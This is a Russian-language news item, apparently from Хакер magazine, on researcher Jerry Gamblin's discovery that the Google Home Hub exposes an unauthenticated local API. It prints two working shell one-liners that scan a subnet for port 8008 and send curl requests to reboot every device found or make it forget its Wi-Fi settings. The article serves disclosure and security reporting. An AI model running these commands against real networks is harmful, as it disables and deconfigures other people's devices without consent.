Хакер #305. Многошаговые SQL-инъекции
Исследователь Джерри Гэмблин (Jerry Gamblin) обнаружил, что API недавно запущенного «умного» дисплея Google Home Hub позволяет управлять им с любых устройств, находящихся в той же беспроводной сети. Это позволяет не просто передавать устройству различные команды, но также перезагрузить его или вовсе отключить от сети Wi-Fi, после чего Google Home Hub потребуется перенастраивать вручную.
Гэмблин объясняет, что обнаружил проблему, подключив собственный Google Home Hub и обнаружив в него множество открытых портов. Корень проблемы кроется в софтверном веб-интерфейсе устройства, о котором ранее известно не было. Исследователь пришел к выводу, что этот API может использоваться любой другой машиной, подключенной той же сети Wi-Fi причем без какой-либо аутентификации.
Как уже было сказано выше, через данный API можно спровоцировать перезагрузку Home Hub или удалить текущие настройки сетевой конфигурации. Так, ребут провоцирует следующая команда:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot
Удаление сетевых настроек, в свою очередь, осуществляется так:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi
Эксперт пишет, что глубоко шокирован тем, насколько плоха безопасность этих устройств. При этом он отмечает, что специалистам Google определенно известно об этих проблемах.